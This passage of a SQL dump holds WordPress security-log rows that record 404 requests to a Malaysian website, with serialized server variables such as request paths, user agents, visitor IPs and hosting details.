Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E761CDC3-DD77-433A-9741-6A410C49B985\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYs39t1OETjqfsv3Bw5c9QAAAJY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.112\";s:11:\"REMOTE_PORT\";s:5:\"49942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYs39t1OETjqfsv3Bw5c9QAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569404918.5343\";s:12:\"REQUEST_TIME\";s:10:\"1569404918\";}}','notice','2019-09-25 09:48:40','2019-09-25 09:48:38',31088136,32894720,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.112'),(26977,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYs6A91OETjqfsv3Bw5e8gAAAJE\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.79.78\";s:11:\"REMOTE_PORT\";s:5:\"46150\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYs6A91OETjqfsv3Bw5e8gAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569405443.3277\";s:12:\"REQUEST_TIME\";s:10:\"1569405443\";}}','notice','2019-09-25 09:57:26','2019-09-25 09:57:23',29638736,29986104,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.79.78'),(26978,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYs6Yt1OETjqfsv3Bw5fcgAAAJg\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.79.80\";s:11:\"REMOTE_PORT\";s:5:\"42766\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYs6Yt1OETjqfsv3Bw5fcgAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569405538.9903\";s:12:\"REQUEST_TIME\";s:10:\"1569405538\";}}','notice','2019-09-25 09:59:00','2019-09-25 09:58:59',29637776,29985960,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.79.80'),(26979,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/?page_id=180\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:33:\"gzip, deflate;q=1.0, identity;q=0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:11:\"page_id=180\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"5.62.43.170\";s:11:\"REMOTE_PORT\";s:4:\"4187\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtMR91OETjqfsv3Bw5rWQAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569410122.7719\";s:12:\"REQUEST_TIME\";s:10:\"1569410122\";}}','notice','2019-09-25 11:15:25','2019-09-25 11:15:23',31218752,33030584,'https://bintara.com.my/?page_id=180',1,0,'5.62.43.170'),(27124,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"263D8C92-03EC-4D5C-8FE3-EA44DB6EDBEB\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1hiy1qHur9FmvlY@eZogAAAM8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"51886\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1hiy1qHur9FmvlY@eZogAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569546635.4398\";s:12:\"REQUEST_TIME\";s:10:\"1569546635\";}}','notice','2019-09-27 01:10:38','2019-09-27 01:10:35',35886488,37688392,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.87'),(27125,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E8EC0F7C-5850-4B58-9D14-CAB47CB6D698\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1nNYobU@zjjbgWMCCIaQAAAQ4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"63434\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1nNYobU@zjjbgWMCCIaQAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569548086.0175\";s:12:\"REQUEST_TIME\";s:10:\"1569548086\";}}','notice','2019-09-27 01:34:48','2019-09-27 01:34:46',35492800,37290760,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.87'),(27126,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"F349BF97-DAC5-4512-B2EC-5EB94E4DB6BB\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY1nXIobU@zjjbgWMCCIdAAAARM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"50254\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1nXIobU@zjjbgWMCCIdAAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569548124.3095\";s:12:\"REQUEST_TIME\";s:10:\"1569548124\";}}','notice','2019-09-27 01:35:25','2019-09-27 01:35:24',35494760,37294520,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.87'),(27127,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:114:\"/?page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3343.4 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:112:\"page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"49778\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1s3NR73RJ5LoNAIQaIEgAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569549532.337\";s:12:\"REQUEST_TIME\";s:10:\"1569549532\";}}','notice','2019-09-27 01:58:54','2019-09-27 01:58:52',35127824,36933728,'https://bintara.com.my/?page_id=18%26error=DIFFERENT_DOMAIN%26back=http%3A%2F%2Fvintageguitar.mobi%2F%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'94.249.167.197'),(27128,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"6EFF37D6-69FC-4B2F-A15F-CC3727413ABE\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT